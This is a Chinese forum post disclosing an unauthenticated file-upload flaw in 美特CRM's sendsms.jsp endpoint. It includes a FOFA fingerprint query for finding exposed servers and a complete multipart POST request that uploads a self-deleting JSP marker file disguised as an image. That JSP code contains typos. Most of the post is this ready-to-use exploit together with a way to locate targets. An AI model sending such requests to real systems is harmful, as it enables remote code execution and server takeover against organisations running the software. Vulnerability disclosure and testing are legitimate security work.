吾要学习网

 找回密码
 立即注册
查看: 212|回复: 0

美特CRM sendsms.jsp 文件上传漏洞

[复制链接]
  • TA的每日心情

    昨天 21:42
  • 签到天数: 56 天

    连续签到: 6 天

    [LV.5]常住居民I

    409

    主题

    414

    帖子

    3661

    积分

    管理员

    Rank: 9Rank: 9Rank: 9

    积分
    3661
    发表于 2025-11-11 14:59:45 | 显示全部楼层 |阅读模式
    美特CRM sendsms.jsp接口存在文件上传漏洞,未经身份攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

    FOFA:body="/common/scripts/basic.js"


    POST /business/common/sms/sendsms.jsp HTTP/1.1
    Host:IP
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybVq0hJPpmSt55HJ8
    Cookie: JSESSIONID=AFC743DC4071339317C9BDC3F550EADB; recPos=var%20oPopDragLeft%3D753%3Bvar%20oPopDragTop%3D7
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
    Content-Length: 314

    ------WebKitFormBoundarybVq0hJPpmSt55HJ8
    Content-Disposition: form-data; name="file"; filename="4ejbsz.jsp"
    Content-Type: image/jpeg

    <%·out .printin("pboyjnnrfipmplsukdeczudsefxmywe");new java.io.File(application.getRealPath(request.getservletPath())).delete(); %>
    ------WebKitFormBoundarybVq0hJPpmSt55HJ8--















    1.每日签到,不仅是积分的累积,更是自我坚持的浪漫宣言。
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    QQ|手机版|小黑屋|吾要学习网 ( 陕ICP备2025065860号-1 )|网站地图|陕公网安备61010302001313号

    GMT+8, 2025-12-7 21:01 , Processed in 0.127846 second(s), 25 queries .

    Powered by Discuz! X3.4

    Copyright © 2001-2020, Tencent Cloud.

    快速回复 返回顶部 返回列表